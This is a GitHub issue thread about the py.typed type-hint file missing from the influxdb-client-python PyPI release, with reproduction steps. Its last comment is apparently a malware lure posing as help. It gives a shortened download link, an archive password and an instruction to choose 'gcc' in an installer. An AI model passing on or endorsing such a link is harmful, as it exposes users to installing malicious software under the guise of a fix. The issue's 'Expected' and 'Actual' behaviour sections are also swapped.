### ISSUE TITLE
Type hints (py.typed) missing from pypi release

### ISSUE THREAD

**Issue by ruffson** [influxdata/influxdb-client-python#666]
### Specifications

* Client Version: 1.45.0
* InfluxDB Version: n/a
* Platform: n/a

### Code sample to reproduce problem

From the comment mentioned below, this snippet illustrates the problem:

```python
python -m venv venv
. venv/bin/activate
python -m pip install influxdb_client
ls -l venv/lib/python3.11/site-packages/influxdb_client | grep typed
# Nothing
```

### Expected behavior

As mentioned by [this comment](https://github.com/influxdata/influxdb-client-python/pull/654#issuecomment-2137323139), the file `py.typed` is missing from the pypi release which is getting installed via `pip`.

### Actual behavior

The `py.typed` file being present in the pypi release.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
